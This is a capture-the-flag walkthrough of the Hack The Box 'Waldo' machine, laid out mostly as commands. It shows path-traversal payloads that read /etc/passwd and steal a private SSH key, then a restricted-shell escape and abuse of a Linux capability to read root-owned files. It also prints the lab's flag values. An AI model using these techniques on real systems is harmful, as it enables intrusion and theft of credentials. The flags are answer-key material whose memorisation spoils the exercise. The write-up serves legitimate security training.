WaldoPlatform: Hack The Box
IP Address: 10.10.10.87
Difficulty: Medium
Waldo is a medium difficulty machine highlighting the risk of insufficient input validation, restricted shell bypass (rbash escape), and privilege escalation via Linux Capabilities.
nmap -p- 10.10.10.87 --min-rate 10000
nmap -p 22,80,8888 10.10.10.87 -sCV -oN nmapscan
list manager web app on port 80 using list.jsdirRead.phpfileRead.phpPOST /fileRead.php
file=....//....//....//....//etc/passwd
Found nobody user with /bin/sh shell.
POST /dirRead.php
path=....//....//....//....//home/nobody/.ssh
POST /fileRead.php
file=....//....//....//....//home/nobody/.ssh/.monitor
Retrieved private SSH key.
nobodyssh -i .monitor nobody@10.10.10.87
Grabbed user.txt:
cat user.txt
b0e38105e739a6e079ef6a3a0e62fb67
monitor userReused .monitor key:
ssh -i .monitor monitor@localhost
Found restricted shell rbash.
Escaped with:
ssh -i .monitor monitor@localhost -t bash --noprofile
# Fix $PATH
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/sbin:/bin:$PATH
getcap -r /* 2>/dev/null
Found:
/usr/bin/tac = cap_dac_read_search+ei
tac./tac /root/root.txt
eff2b317239aa0558a7031a66f33f350
getcap to enumerate Linux Capabilitiescap_dac_read_search using tacWriteup by inksec
GitHub: [https://github.com/inkedqt]